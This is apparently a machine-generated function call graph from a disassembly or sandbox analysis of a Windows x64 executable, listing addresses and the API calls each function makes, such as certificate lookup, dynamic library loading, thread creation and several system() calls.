7ff6029dad79 MultiByteToWideChar 48863->48872 48864->48863 48866->48856 48875 7ff6029c6400 15 API calls 48867->48875 48878 7ff6029db09b 48867->48878 48868 7ff6029dabd6 free 48868->48822 48869->48862 48870->48803 48876 7ff6029dadd4 GetLastError 48871->48876 48877 7ff6029dae2a CertFindCertificateInStore 48871->48877 48872->48871 48874 7ff6029db0fd calloc 48879 7ff6029db170 48874->48879 48880 7ff6029db157 48874->48880 48875->48878 48881 7ff6029dae11 48876->48881 48882 7ff6029dade9 48876->48882 48884 7ff6029dae52 GetLastError 48877->48884 48885 7ff6029dae86 48877->48885 48878->48874 48879->48822 48889 7ff6029db27c 48879->48889 48890 7ff6029db1d9 free 48879->48890 48918 7ff6029c6280 19 API calls 48880->48918 48911 7ff6029c6280 19 API calls 48881->48911 48910 7ff6029c6280 19 API calls 48882->48910 48912 7ff6029c6280 19 API calls 48884->48912 48885->48870 48893 7ff6029c6b40 48 API calls 48889->48893 48891 7ff6029db20a 48890->48891 48892 7ff6029db256 48890->48892 48895 7ff6029db212 48891->48895 48896 7ff6029db230 48891->48896 48923 7ff6029b2620 22 API calls 48892->48923 48897 7ff6029db29d 48893->48897 48919 7ff6029b2620 22 API calls 48895->48919 48921 7ff6029b2620 22 API calls 48896->48921 48897->48822 48925 7ff6029c6280 19 API calls 48897->48925 48899 7ff6029db260 48924 7ff6029c6280 19 API calls 48899->48924 48901 7ff6029db23a 48922 7ff6029c6280 19 API calls 48901->48922 48903 7ff6029db219 48920 7ff6029c6280 19 API calls 48903->48920 48907->48802 48908->48833 48909->48868 48910->48833 48911->48833 48912->48862 48913->48812 48914->48850 48915->48833 48916->48840 48917->48853 48918->48822 48919->48903 48920->48833 48921->48901 48922->48833 48923->48899 48924->48833 48925->48822 48926 7ff6029cf4f0 48927 7ff6029cf53e 48926->48927 48928 7ff6029cf860 18 API calls 48927->48928 48929 7ff6029cf55b 48928->48929 48930 7ff6029c6400 15 API calls 48929->48930 48933 7ff6029cf577 48929->48933 48930->48933 48931 7ff6029d8210 13 API calls 48934 7ff6029cf5f6 48931->48934 48932 7ff6029fff10 8 API calls 48935 7ff6029cf6f2 48932->48935 48933->48931 48959 7ff6029cf6c5 48933->48959 48936 7ff6029cf5fa 48934->48936 48937 7ff6029cf61b 48934->48937 48960 7ff6029d91c0 15 API calls 48936->48960 48939 7ff6029d8210 13 API calls 48937->48939 48941 7ff6029cf62d 48939->48941 48940 7ff6029cf60f 48940->48937 48942 7ff6029cf70a 48940->48942 48943 7ff6029cf631 48941->48943 48949 7ff6029cf652 48941->48949 48945 7ff6029cf714 48942->48945 48961 7ff6029d91c0 15 API calls 48943->48961 48965 7ff6029cea70 27 API calls 48945->48965 48947 7ff6029cf646 48947->48942 48947->48949 48948 7ff6029cf736 48950 7ff6029cf6be 48948->48950 48966 7ff6029d8f90 free free free 48948->48966 48953 7ff6029cf683 48949->48953 48949->48959 48962 7ff6029f32c0 534 API calls 48949->48962 48950->48959 48953->48942 48954 7ff6029cf6a0 48953->48954 48955 7ff6029cf6c0 48954->48955 48956 7ff6029cf6b9 48954->48956 48954->48959 48964 7ff6029bb710 51 API calls 48955->48964 48963 7ff6029f34c0 314 API calls 48956->48963 48959->48932 48960->48940 48961->48947 48962->48953 48963->48950 48964->48959 48965->48948 48966->48950 48967 7ff6029d9af0 48970 7ff6029f2d90 48967->48970 48971 7ff6029f2d9e 48970->48971 48976 7ff6029d9af9 48970->48976 48972 7ff6029c9110 14 API calls 48971->48972 48973 7ff6029f2db1 48972->48973 48978 7ff6029c8f70 GetModuleHandleA 48973->48978 48975 7ff6029f2dca 48975->48976 48977 7ff6029f2dd6 GetProcAddressForCaller 48975->48977 48977->48976 48979 7ff6029c8f92 48978->48979 48980 7ff6029c8f9a GetProcAddress strpbrk 48978->48980 48979->48975 48981 7ff6029c8ffe 48980->48981 48982 7ff6029c8fc7 48980->48982 48983 7ff6029c9003 GetProcAddress 48981->48983 48984 7ff6029c9036 GetSystemDirectoryA 48981->48984 48985 7ff6029c8fcf 48982->48985 48986 7ff6029c8fe8 LoadLibraryA 48982->48986 48983->48984 48987 7ff6029c9018 LoadLibraryExA 48983->48987 48988 7ff6029c9050 malloc 48984->48988 48989 7ff6029c90f8 48984->48989 48985->48975 48986->48975 48987->48975 48991 7ff6029c90ea free 48988->48991 48992 7ff6029c907d GetSystemDirectoryA 48988->48992 48989->48975 48991->48989 48992->48991 48993 7ff6029c908d 48992->48993 48993->48993 48994 7ff6029c90e1 LoadLibraryA 48993->48994 48995 7ff6029c90d6 48993->48995 48994->48995 48995->48991 48996 7ff6029d9770 48997 7ff6029c0ce0 48996->48997 48998 7ff6029d9785 48996->48998 49001 7ff6029d97c0 48997->49001 49002 7ff6029d980c 49001->49002 49003 7ff6029c6400 15 API calls 49002->49003 49005 7ff6029d9850 49003->49005 49004 7ff6029d99c5 49008 7ff6029d99df free 49004->49008 49013 7ff6029d9a02 49004->49013 49005->49004 49009 7ff6029d98b4 49005->49009 49010 7ff6029d98d7 49005->49010 49006 7ff6029d9a90 49011 7ff6029d98dc 49006->49011 49012 7ff6029d9a99 free 49006->49012 49007 7ff6029d9a57 free 49007->49006 49008->49013 49024 7ff6029b2620 22 API calls 49009->49024 49010->49004 49010->49011 49021 7ff6029c6b40 48 API calls 49010->49021 49015 7ff6029fff10 8 API calls 49011->49015 49012->49011 49018 7ff6029d9a2c free 49013->49018 49019 7ff6029d9a35 49013->49019 49017 7ff6029c0cfc 49015->49017 49016 7ff6029d98c5 49025 7ff6029c6280 19 API calls 49016->49025 49018->49019 49019->49006 49019->49007 49022 7ff6029d9984 49021->49022 49022->49004 49023 7ff6029c6400 15 API calls 49022->49023 49023->49004 49024->49016 49025->49010 49026 7ff602a001ec 49027 7ff602a00205 49026->49027 49028 7ff602a00343 49027->49028 49029 7ff602a0020d __scrt_acquire_startup_lock 49027->49029 49108 7ff602a0067c 9 API calls 49028->49108 49031 7ff602a0034d 49029->49031 49036 7ff602a0022b __scrt_release_startup_lock 49029->49036 49109 7ff602a0067c 9 API calls 49031->49109 49033 7ff602a00358 49035 7ff602a00360 _exit 49033->49035 49034 7ff602a00250 49036->49034 49037 7ff602a002d6 _get_initial_narrow_environment __p___argv __p___argc 49036->49037 49040 7ff602a002ce _register_thread_local_exe_atexit_callback 49036->49040 49046 7ff6029b1e40 49037->49046 49040->49037 49110 7ff6029ffb18 49046->49110 49050 7ff6029b1eb8 49052 7ff6029b235e ?_Throw_Cpp_error@std@@YAXH 49050->49052 49053 7ff6029b1ec3 _Thrd_detach 49050->49053 49051 7ff6029b2369 ?_Throw_Cpp_error@std@@YAXH 49052->49051 49053->49052 49054 7ff6029b1ee0 16 API calls 49053->49054 49119 7ff6029a2ab0 49054->49119 49108->49031 49109->49033 49111 7ff6029ffb32 malloc 49110->49111 49112 7ff6029b1e6f _beginthreadex 49111->49112 49113 7ff6029ffb23 49111->49113 49112->49050 49112->49051 49113->49111 49114 7ff6029ffb42 49113->49114 49115 7ff6029ffb4d 49114->49115 49208 7ff602a00640 _CxxThrowException std::bad_alloc::bad_alloc 49114->49208 49209 7ff6029a1a00 49115->49209 49118 7ff6029ffb53 49212 7ff6029a2850 49119->49212 49121 7ff6029a2afa 49122 7ff6029a30b8 49121->49122 49225 7ff6029a3170 49121->49225 49341 7ff6029a3130 7 API calls 49122->49341 49124 7ff6029a3114 Sleep exit 49126 7ff6029a3128 49124->49126 49128 7ff6029a1a00 Concurrency::cancel_current_task __std_exception_copy 49126->49128 49127 7ff6029a2b7f 49237 7ff6029a3c40 49127->49237 49130 7ff6029a312d 49128->49130 49131 7ff6029a2b8c 49244 7ff6029a32e0 49131->49244 49133 7ff6029a2bbc 49134 7ff6029a3c40 10 API calls 49133->49134 49135 7ff6029a2bc8 49134->49135 49252 7ff6029a33e0 49135->49252 49137 7ff6029a2bfb 49138 7ff6029a3c40 10 API calls 49137->49138 49139 7ff6029a2c08 49138->49139 49140 7ff6029a2c5f 49139->49140 49143 7ff6029a2c58 _invalid_parameter_noinfo_noreturn 49139->49143 49141 7ff6029a2caf 49140->49141 49144 7ff6029a2ca8 _invalid_parameter_noinfo_noreturn 49140->49144 49142 7ff6029a2cee 49141->49142 49146 7ff6029a2ce7 _invalid_parameter_noinfo_noreturn 49141->49146 49145 7ff6029a2d3c 49142->49145 49148 7ff6029a2d35 _invalid_parameter_noinfo_noreturn 49142->49148 49143->49140 49144->49141 49149 7ff6029a2d74 _invalid_parameter_noinfo_noreturn 49145->49149 49152 7ff6029a2d7b 49145->49152 49146->49142 49148->49145 49149->49152 49152->49126 49210 7ff6029a1a0e Concurrency::cancel_current_task 49209->49210 49211 7ff6029a1a1f __std_exception_copy 49210->49211 49211->49118 49213 7ff6029a28a0 49212->49213 49213->49213 49214 7ff6029a28b0 system 49213->49214 49215 7ff6029a2910 49214->49215 49215->49215 49216 7ff6029a2920 system 49215->49216 49217 7ff6029a2970 49216->49217 49217->49217 49218 7ff6029a2980 system 49217->49218 49219 7ff6029a29c0 49218->49219 49219->49219 49220 7ff6029a29d0 system 49219->49220 49221 7ff6029a2a10 49220->49221 49221->49221 49222 7ff6029a2a20 system 49221->49222 49223 7ff6029a2a80 49222->49223 49223->49223 49224 7ff6029a2a90 system 49223->49224 49224->49121 49226 7ff6029a318e 49225->49226 49227 7ff6029a4320 7 API calls 49226->49227 49228 7ff6029a31d8 49226->49228 49227->49228 49229 7ff6029a3237 49228->49229 49230 7ff6029a4320 7 API calls 49228->49230 49342 7ff6029a5de0 49229->49342 49230->49229 49233 7ff6029a3286 49234 7ff6029a32c7 49233->49234 49236 7ff6029a32c0 _invalid_parameter_noinfo_noreturn 49233->49236 49234->49127 49235 7ff6029a327f _invalid_parameter_noinfo_noreturn 49235->49233 49236->49234 49238 7ff6029a3c5d 49237->49238 49239 7ff6029a3c73 memcpy 49238->49239 49240 7ff6029a3cb8 49238->49240 49239->49131 49368 7ff6029a4ec0 9 API calls Concurrency::cancel_current_task 49240->49368 49243 7ff6029a3ccb 49243->49131 49246 7ff6029a32fe 49244->49246 49245 7ff6029a3348 49369 7ff6029a6de0 49245->49369 49246->49245 49247 7ff6029a4320 7 API calls 49246->49247 49247->49245 49249 7ff6029a3364 49250 7ff6029a33c7 49249->49250 49251 7ff6029a33c0 _invalid_parameter_noinfo_noreturn 49249->49251 49250->49133 49251->49250 49253 7ff6029a33fe 49252->49253 49254 7ff6029a4320 7 API calls 49253->49254 49256 7ff6029a3448 49253->49256 49254->49256 49255 7ff6029a6de0 12 API calls 49257 7ff6029a3464 49255->49257 49256->49255 49258 7ff6029a34c7 49257->49258 49259 7ff6029a34c0 _invalid_parameter_noinfo_noreturn 49257->49259 49258->49137 49259->49258 49341->49124 49343 7ff6029a5e7f 49342->49343 49344 7ff6029a5e2a 49342->49344 49346 7ff6029a5e87 memcpy 49343->49346 49352 7ff6029a5edb 49343->49352 49344->49343 49345 7ff6029a5e2f memcpy 49344->49345 49349 7ff6029a324a 49345->49349 49347 7ff6029a5ec1 49346->49347 49348 7ff6029a5ec4 memcpy 49346->49348 49347->49348 49348->49349 49349->49233 49349->49235 49354 7ff6029a5f37 49352->49354 49355 7ff6029a5fbc 49352->49355 49356 7ff6029a5f59 49352->49356 49364 7ff6029a5fc1 49352->49364 49360 7ff6029ffb18 3 API calls 49354->49360 49359 7ff6029a1a00 Concurrency::cancel_current_task __std_exception_copy 49355->49359 49357 7ff6029a5f44 memcpy 49356->49357 49361 7ff6029ffb18 3 API calls 49356->49361 49362 7ff6029a5f90 49357->49362 49363 7ff6029a5f93 memcpy 49357->49363 49359->49364 49365 7ff6029a5f3f 49360->49365 49361->49357 49362->49363 49363->49349 49367 7ff6029a1aa0 ?_Xlength_error@std@@YAXPEBD 49364->49367 49365->49357 49366 7ff6029a5f52 _invalid_parameter_noinfo_noreturn 49365->49366 49366->49356 49368->49243 49370 7ff6029a6ea5 49369->49370 49373 7ff6029a6e10 memcpy memcpy memcpy 49369->49373 49375 7ff6029ac610 9 API calls Concurrency::cancel_current_task 49370->49375 49372 7ff6029a6eba 49372->49249 49373->49249 49375->49372 49760 7ff6029b8708 49761 7ff6029b8721 49760->49761 49762 7ff6029b87af 49761->49762 49764 7ff6029b8984 49761->49764 49801 7ff6029cce20 49762->49801 49845 7ff6029b6100 17 API calls 49764->49845 49768 7ff6029b87d4 49769 7ff6029b8870 49768->49769 49770 7ff6029b8805 49768->49770 49774 7ff6029b87de 49768->49774 49771 7ff6029b8921 49769->49771 49772 7ff6029b8878 49769->49772 49777 7ff6029b7610 292 API calls 49770->49777 49799 7ff6029b7b8b 49771->49799 49844 7ff6029b6100 17 API calls 49771->49844 49772->49770 49778 7ff6029b888e 49772->49778 49779 7ff6029b88fb free 49772->49779 49776 7ff6029b7610 292 API calls 49774->49776 49776->49799 49782 7ff6029b8823 49777->49782 49783 7ff6029b889b free 49778->49783 49778->49799 49779->49770 49780 7ff6029b8c32 49781 7ff6029b8c23 49848 7ff6029c6280 19 API calls 49781->49848 49842 7ff6029cc6e0 28 API calls 49782->49842 49843 7ff6029cc6e0 28 API calls 49783->49843 49784 7ff6029b8db0 17 API calls 49784->49799 49788 7ff6029b88c3 free 49791 7ff6029b88d9 49788->49791 49788->49799 49789 7ff6029b8854 free 49789->49799 49790 7ff6029c1d40 90 API calls 49790->49799 49794 7ff6029b7610 292 API calls 49791->49794 49793 7ff6029c7b00 10 API calls 49793->49799 49794->49799 49795 7ff6029b8832 49795->49789 49796 7ff6029b7c2e 49797 7ff6029c6280 19 API calls 49796->49797 49796->49799 49797->49796 49799->49780 49799->49781 49799->49784 49799->49790 49799->49793 49799->49796 49800 7ff6029b7610 292 API calls 49799->49800 49840 7ff6029c6280 19 API calls 49799->49840 49846 7ff6029b6330 15 API calls 49799->49846 49847 7ff6029d5af0 22 API calls 49799->49847 49800->49799 49802 7ff6029cce71 49801->49802 49803 7ff6029ccebf 49802->49803 49804 7ff6029d68f0 19 API calls 49802->49804 49805 7ff6029ccedd 49803->49805 49806 7ff6029ccec6 49803->49806 49804->49803 49808 7ff6029ccf09 49805->49808 49849 7ff6029cd530 49805->49849 49882 7ff6029c6280 19 API calls 49806->49882 49809 7ff6029ccf3e 49808->49809 49810 7ff6029ccf26 49808->49810 49830 7ff6029b87c3 49808->49830 49812 7ff6029ce0c0 2 API calls 49809->49812 49883 7ff6029cdc80 90 API calls 49810->49883 49817 7ff6029ccf48 49812->49817 49814 7ff6029ccf36 49814->49809 49814->49830 49815 7ff6029ccfb8 49884 7ff6029d5af0 22 API calls 49815->49884 49817->49815 49822 7ff6029c6400 15 API calls 49817->49822 49818 7ff6029ccfc0 49818->49830 49885 7ff6029d6c60 23 API calls 49818->49885 49820 7ff6029ccfde 49821 7ff6029ccff2 49820->49821 49828 7ff6029cd072 49820->49828 49820->49830 49824 7ff6029c7b00 10 API calls 49821->49824 49822->49815 49823 7ff6029cd0d9 49890 7ff6029d5af0 22 API calls 49823->49890 49826 7ff6029cd001 49824->49826 49825 7ff6029cd0b0 49825->49823 49832 7ff6029cd0c3 49825->49832 49829 7ff6029cd00a 49826->49829 49826->49830 49828->49823 49828->49825 49831 7ff6029cd097 49828->49831 49836 7ff6029cd041 49829->49836 49837 7ff6029cd05c 49829->49837 49830->49768 49841 7ff6029cd120 24 API calls 49830->49841 49888 7ff6029c6280 19 API calls 49831->49888 49889 7ff6029c6280 19 API calls 49832->49889 49835 7ff6029cced5 49835->49830 49886 7ff6029c6280 19 API calls 49836->49886 49887 7ff6029c6280 19 API calls 49837->49887 49840->49799 49841->49768 49842->49795 49843->49788 49844->49799 49845->49799 49846->49799 49847->49799 49848->49780 49867 7ff6029cd580 49849->49867 49851 7ff6029d59a0 2 API calls 49851->49867 49852 7ff6029ce0c0 2 API calls 49852->49867 49853 7ff6029cdaba 49855 7ff6029c6400 15 API calls 49853->49855 49856 7ff6029cdad3 49853->49856 49855->49856 49856->49808 49857 7ff6029cda97 49857->49853 49859 7ff6029c6400 15 API calls 49857->49859 49858 7ff6029cd810 49858->49867 49895 7ff6029c61c0 fwrite fwrite 49858->49895 49896 7ff6029c61c0 fwrite fwrite 49858->49896 49859->49853 49863 7ff6029c6400 15 API calls 49863->49867 49864 7ff6029cdb51 49865 7ff6029cdb6d 49864->49865 49866 7ff6029cdb56 49864->49866 49901 7ff6029c6280 19 API calls 49865->49901 49900 7ff6029c6280 19 API calls 49866->49900 49867->49851 49867->49852 49867->49853 49867->49856 49867->49857 49867->49858 49867->49863 49867->49864 49868 7ff6029cdabf 49867->49868 49876 7ff6029cd7ec 49867->49876 49879 7ff6029c61a0 23 API calls 49867->49879 49891 7ff6029c6570 49867->49891 49894 7ff6029d31a0 192 API calls 49867->49894 49897 7ff6029f2ea0 23 API calls 49867->49897 49898 7ff6029df9c0 23 API calls 49867->49898 49870 7ff6029cdaf3 49868->49870 49871 7ff6029cdac7 49868->49871 49899 7ff6029c6280 19 API calls 49870->49899 49875 7ff6029c6400 15 API calls 49871->49875 49872 7ff6029cdaff 49872->49856 49875->49856 49877 7ff6029c6400 15 API calls 49876->49877 49878 7ff6029cdb18 49877->49878 49881 7ff6029c6400 15 API calls 49878->49881 49879->49867 49881->49856 49882->49835 49883->49814 49884->49818 49885->49820 49886->49835 49887->49835 49888->49835 49889->49835 49890->49830 49902 7ff6029dbed0 49891->49902 49894->49867 49895->49858 49896->49867 49897->49867 49898->49867 49899->49872 49900->49872 49901->49872 49903 7ff6029dbf4f 49902->49903 49904 7ff6029dbf6e 49902->49904 49903->49904 49907 7ff6029dbf55 49903->49907 49905 7ff6029dbf92 49904->49905 49906 7ff6029dbf75 49904->49906 49910 7ff6029dbf98 49905->49910 49914 7ff6029dbfb1 49905->49914 49909 7ff6029c6400 15 API calls 49906->49909 49908 7ff6029c6400 15 API calls 49907->49908 49920 7ff6029dbf64 49908->49920 49909->49920 49911 7ff6029c6400 15 API calls 49910->49911 49911->49920 49912 7ff6029dc406 49917 7ff6029dc505 memcpy memcpy 49912->49917 49921 7ff6029dc54b 49912->49921 49913 7ff6029dbfe0 realloc 49915 7ff6029dc02e 49913->49915 49916 7ff6029dc00d 49913->49916 49914->49913 49914->49915 49935 7ff6029dc0a9 49914->49935 49919 7ff6029c6600 2 API calls 49915->49919 49948 7ff6029c6280 19 API calls 49916->49948 49917->49921 49923 7ff6029dc077 49919->49923 49920->49912 49924 7ff6029c9110 14 API calls 49920->49924 49925 7ff6029fff10 8 API calls 49921->49925 49922 7ff6029dc024 49922->49920 49928 7ff6029dc26e 49923->49928 49929 7ff6029dc09d 49923->49929 49923->49935 49926 7ff6029dc3f6 49924->49926 49927 7ff6029c65cb 49925->49927 49926->49912 49930 7ff6029c6400 15 API calls 49926->49930 49927->49867 49931 7ff6029c6400 15 API calls 49928->49931 49932 7ff6029c6400 15 API calls 49929->49932 49930->49912 49931->49935 49932->49935 49933 7ff6029c6400 15 API calls 49933->49920 49934 7ff6029da390 255 API calls 49934->49935 49935->49920 49935->49934 49936 7ff6029c6400 15 API calls 49935->49936 49937 7ff6029dc417 49935->49937 49938 7ff6029dc1b0 realloc 49935->49938 49940 7ff6029dc38e 49935->49940 49943 7ff6029dc24b memcpy 49935->49943 49945 7ff6029dc1fb memcpy 49935->49945 49936->49935 49937->49940 49941 7ff6029dc446 49937->49941 49938->49935 49939 7ff6029dc476 49938->49939 49950 7ff6029c6280 19 API calls 49939->49950 49940->49920 49940->49933 49949 7ff6029b2620 22 API calls 49941->49949 49943->49935 49945->49935 49946 7ff6029dc45f 49947 7ff6029c6400 15 API calls 49946->49947 49947->49920 49948->49922 49949->49946 49950->49922 49951 7ff6029b7d4c 49952 7ff6029d59a0 2 API calls 49951->49952 49953 7ff6029b7d59 49952->49953 49954 7ff6029b7d75 49953->49954 50009 7ff6029b6100 17 API calls 49953->50009 49955 7ff6029b7d91 49954->49955 50010 7ff6029b6100 17 API calls 49954->50010 49978 7ff6029c1aa0 free free 49955->49978 49959 7ff6029b7da1 49960 7ff6029c6400 15 API calls 49959->49960 49963 7ff6029b7df7 49959->49963 49974 7ff6029b7b8b 49959->49974 49961 7ff6029b7deb 49960->49961 49962 7ff6029b8db0 17 API calls 49961->49962 49962->49963 49963->49974 50011 7ff6029cbe90 free 49963->50011 49964 7ff6029b8db0 17 API calls 49964->49974 49967 7ff6029b8c32 49968 7ff6029b8c23 50014 7ff6029c6280 19 API calls 49968->50014 49970 7ff6029c1d40 90 API calls 49970->49974 49972 7ff6029c7b00 10 API calls 49972->49974 49973 7ff6029b7c2e 49973->49974 49975 7ff6029c6280 19 API calls 49973->49975 49974->49964 49974->49967 49974->49968 49974->49970 49974->49972 49974->49973 49977 7ff6029b7610 292 API calls 49974->49977 50008 7ff6029c6280 19 API calls 49974->50008 50012 7ff6029b6330 15 API calls 49974->50012 50013 7ff6029d5af0 22 API calls 49974->50013 49975->49973 49977->49974 49979 7ff6029c1880 292 API calls 49978->49979 49980 7ff6029c1afa 49979->49980 49981 7ff6029c1880 292 API calls 49980->49981 49982 7ff6029c1b06 memset 49981->49982 50015 7ff6029c3230 49982->50015 49984 7ff6029c1bce 49987 7ff6029c1d40 90 API calls 49984->49987 49989 7ff6029c1b4d 49984->49989 49986 7ff6029d59a0 2 API calls 49988 7ff6029c1b6f 49986->49988 49987->49989 49988->49989 49990 7ff6029c1bc2 49988->49990 49991 7ff6029c1b9b free 49988->49991 49989->49959 49990->49984 49993 7ff6029ce0c0 2 API calls 49990->49993 50105 7ff6029c96c0 15 API calls 49991->50105 49994 7ff6029c1c10 49993->49994 49995 7ff6029c1c24 49994->49995 49996 7ff6029c1c4d 49994->49996 49997 7ff6029c7090 616 API calls 49995->49997 49998 7ff6029d59a0 2 API calls 49996->49998 49999 7ff6029c1c3a 49997->49999 50000 7ff6029c1c5a 49998->50000 49999->49984 50001 7ff6029c1d07 49999->50001 50003 7ff6029c1c7d 50000->50003 50004 7ff6029d59a0 2 API calls 50000->50004 50002 7ff6029ce0c0 2 API calls 50001->50002 50002->49989 50005 7ff6029c7c10 47 API calls 50003->50005 50004->50003 50006 7ff6029c1c97 50005->50006 50006->50001 50007 7ff6029c6400 15 API calls 50006->50007 50007->50001 50008->49974 50009->49954 50010->49955 50011->49974 50012->49974 50013->49974 50014->49967 50016 7ff6029c3275 50015->50016 50104 7ff6029c3299 50016->50104 50106 7ff6029c2a30 calloc 50016->50106 50018 7ff6029c32ab 50018->50104 50121 7ff6029c4ea0 50018->50121 50019 7ff6029fff10 8 API calls 50020 7ff6029c1b35 50019->50020 50020->49984 50020->49986 50020->49989 50023 7ff6029c32f4 50025 7ff6029c3300 _strdup 50023->50025 50026 7ff6029c3312 50023->50026 50024 7ff6029c32e2 _strdup 50024->50023 50024->50104 50025->50026 50025->50104 50171 7ff6029c3c40 50026->50171 50030 7ff6029c9790 13 API calls 50031 7ff6029c3385 50030->50031 50031->50104 50230 7ff6029c4490 50031->50230 50032 7ff6029c33d7 50033 7ff6029c3432 50032->50033 50034 7ff6029c341c _strdup 50032->50034 50032->50104 50035 7ff6029c3455 50033->50035 50036 7ff6029c343c _strdup 50033->50036 50034->50033 50034->50104 50246 7ff6029c4900 50035->50246 50036->50035 50036->50104 50041 7ff6029c34a2 50043 7ff6029c34c4 50041->50043 50044 7ff6029c1fd0 38 API calls 50041->50044 50041->50104 50042 7ff6029c1fd0 38 API calls 50042->50041 50045 7ff6029c1fd0 38 API calls 50043->50045 50046 7ff6029c34e6 50043->50046 50043->50104 50044->50043 50045->50046 50047 7ff6029c367f 50046->50047 50051 7ff6029c35e4 50046->50051 50046->50104 50268 7ff6029bf7b0 50047->50268 50049 7ff6029c381a 50050 7ff6029bf7b0 8 API calls 50049->50050 50049->50104 50052 7ff6029c3831 50050->50052 50053 7ff6029c366f 50051->50053 50054 7ff6029c3604 50051->50054 50052->50104 50292 7ff6029c5360 50052->50292 50055 7ff6029c20a0 2 API calls 50053->50055 50348 7ff6029be6f0 17 API calls 50054->50348 50055->50104 50058 7ff6029c361a 50060 7ff6029c5dd0 17 API calls 50058->50060 50058->50104 50065 7ff6029c362c 50060->50065 50061 7ff6029c3924 50102 7ff6029c39d1 50061->50102 50352 7ff6029bec90 13 API calls 50061->50352 50062 7ff6029c3632 50062->50104 50064 7ff6029c3889 50064->50061 50065->50062 50349 7ff6029cd2b0 17 API calls 50065->50349 50104->50019 50104->50104 50105->49990 50107 7ff6029c2a60 calloc 50106->50107 50108 7ff6029c2a55 50106->50108 50109 7ff6029c2cd1 free 50107->50109 50110 7ff6029c2a8a 50107->50110 50108->50018 50109->50018 50111 7ff6029ce0c0 2 API calls 50110->50111 50112 7ff6029c2b21 50111->50112 50113 7ff6029ce0c0 2 API calls 50112->50113 50114 7ff6029c2b35 50113->50114 50115 7ff6029c2c97 _strdup 50114->50115 50116 7ff6029c2d0d 50114->50116 50115->50116 50117 7ff6029c2ca9 50115->50117 50118 7ff6029ce0c0 2 API calls 50116->50118 50120 7ff6029c2cb7 free free 50117->50120 50119 7ff6029c2d4d 50118->50119 50119->50018 50120->50109 50357 7ff6029c5e80 8 API calls 50121->50357 50124 7ff6029c4ec0 50360 7ff6029eee50 23 API calls 50124->50360 50125 7ff6029c4ec7 50361 7ff6029eee10 calloc 50125->50361 50128 7ff6029c4ecc 50134 7ff6029c4f42 50128->50134 50166 7ff6029c32cc 50128->50166 50362 7ff6029eea80 tolower 50128->50362 50129 7ff6029c4ec5 50129->50128 50131 7ff6029c5005 50365 7ff6029eef90 8 API calls 50131->50365 50133 7ff6029c4f0f 50133->50134 50135 7ff6029c4f28 50133->50135 50136 7ff6029c4f1b free 50133->50136 50134->50131 50134->50166 50364 7ff6029eef90 8 API calls 50134->50364 50363 7ff6029c96c0 15 API calls 50135->50363 50136->50135 50137 7ff6029c506c 50366 7ff6029c6280 19 API calls 50137->50366 50141 7ff6029c4fec 50141->50131 50143 7ff6029c4ff8 free 50141->50143 50141->50166 50142 7ff6029c507e 50142->50166 50143->50131 50144 7ff6029c502e 50144->50137 50145 7ff6029c50a4 50144->50145 50144->50166 50367 7ff6029eef90 8 API calls 50145->50367 50147 7ff6029c50cb 50148 7ff6029c50d5 _strdup 50147->50148 50149 7ff6029c50f2 50147->50149 50148->50149 50148->50166 50149->50166 50368 7ff6029eef90 8 API calls 50149->50368 50151 7ff6029c5115 50152 7ff6029c5138 50151->50152 50153 7ff6029c511f _strdup 50151->50153 50152->50166 50369 7ff6029eef90 8 API calls 50152->50369 50153->50152 50153->50166 50155 7ff6029c5158 50156 7ff6029c5162 _strdup 50155->50156 50157 7ff6029c51ed 50155->50157 50156->50157 50156->50166 50157->50166 50370 7ff6029eef90 8 API calls 50157->50370 50160 7ff6029c5208 50160->50166 50371 7ff6029eef90 8 API calls 50160->50371 50161 7ff6029c523d 50161->50166 50372 7ff6029eef90 8 API calls 50161->50372 50163 7ff6029c5281 50164 7ff6029c52a1 strtoul 50163->50164 50165 7ff6029c5285 50163->50165 50164->50165 50165->50166 50373 7ff6029eef90 8 API calls 50165->50373 50166->50023 50166->50024 50166->50104 50168 7ff6029c531d _strdup 50168->50166 50169 7ff6029c52e0 50169->50168 50169->50169 50374 7ff6029c5f50 20 API calls 50169->50374 50172 7ff6029c3d5d 50171->50172 50173 7ff6029c3c8d memset memset 50171->50173 50174 7ff6029c3d90 50172->50174 50175 7ff6029c3d69 _strdup 50172->50175 50176 7ff6029c3cc0 strncpy 50173->50176 50177 7ff6029c3cd8 50173->50177 50179 7ff6029c3daf 50174->50179 50180 7ff6029c3d9c _strdup 50174->50180 50175->50174 50178 7ff6029c3d77 50175->50178 50176->50177 50181 7ff6029c3cff 50177->50181 50182 7ff6029c3ce4 strncpy 50177->50182 50377 7ff6029c6280 19 API calls 50178->50377 50209 7ff6029c3e0e 50179->50209 50378 7ff6029dc850 realloc GetEnvironmentVariableA realloc free 50179->50378 50180->50178 50180->50179 50375 7ff6029dc990 malloc strtoul free 50181->50375 50182->50181 50185 7ff6029c3d1f 50189 7ff6029c3d4c 50185->50189 50376 7ff6029dc990 malloc strtoul free 50185->50376 50186 7ff6029c3d86 50190 7ff6029c42b7 free free 50186->50190 50188 7ff6029c3dd0 50191 7ff6029c3dec 50188->50191 50379 7ff6029dc850 realloc GetEnvironmentVariableA realloc free 50188->50379 50189->50172 50189->50190 50194 7ff6029fff10 8 API calls 50190->50194 50196 7ff6029c6400 15 API calls 50191->50196 50191->50209 50193 7ff6029c4071 free 50198 7ff6029c4081 50193->50198 50199 7ff6029c40ae 50193->50199 50197 7ff6029c3327 50194->50197 50196->50209 50197->50030 50197->50031 50197->50104 50198->50199 50200 7ff6029c40a2 free 50198->50200 50201 7ff6029c40d8 50199->50201 50205 7ff6029c40c8 free 50199->50205 50200->50199 50206 7ff6029c40dd 50201->50206 50384 7ff6029c4b50 47 API calls 50201->50384 50202 7ff6029c3fb9 50380 7ff6029dc850 realloc GetEnvironmentVariableA realloc free 50202->50380 50203 7ff6029c3f66 50203->50193 50203->50202 50207 7ff6029c3fa0 tolower 50203->50207 50204 7ff6029c40f4 free free free 50216 7ff6029c40e7 50204->50216 50205->50201 50206->50216 50227 7ff6029c4191 50206->50227 50385 7ff6029c4b50 47 API calls 50206->50385 50207->50202 50207->50207 50209->50203 50209->50204 50209->50209 50214 7ff6029c3e7e strchr 50209->50214 50229 7ff6029c3e97 50209->50229 50212 7ff6029c401c 50217 7ff6029c404f 50212->50217 50382 7ff6029dc850 realloc GetEnvironmentVariableA realloc free 50212->50382 50213 7ff6029c413f free 50213->50206 50213->50216 50214->50203 50214->50229 50215 7ff6029c4173 free 50215->50216 50215->50227 50216->50190 50219 7ff6029c6400 15 API calls 50217->50219 50221 7ff6029c406c 50217->50221 50219->50221 50220 7ff6029c4038 50220->50217 50383 